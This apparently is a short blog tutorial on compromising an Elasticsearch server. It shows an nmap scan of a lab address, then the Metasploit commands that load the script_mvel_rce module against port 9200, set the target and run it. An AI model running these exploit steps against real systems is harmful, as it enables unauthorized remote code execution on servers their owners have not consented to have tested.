Elastic search is a distributed
REST search engine used in companies for analytic search. And so we will learn
how to exploit our victim through it. Start off by nmap.
nmap –p- -A 192.168.1.8
Nmap shows a splendid result
and in the result you can see that HHTP service going on 9200 which is using
elasticseatch REST. Let’s search it exploit on google.
YES! We have an exploit for that.
Let’s use it to our advantage.
To use this exploit go to
Metasploit and type:
use exploit/multi/elasticsearch/script_mvel_rce
msf exploit (script_mvel_rce)>set rhost 192.168.1.8
msf exploit (script_mvel_rce)>set rport 9200
msf exploit (script_mvel_rce)>exploit
0 comments:
Post a Comment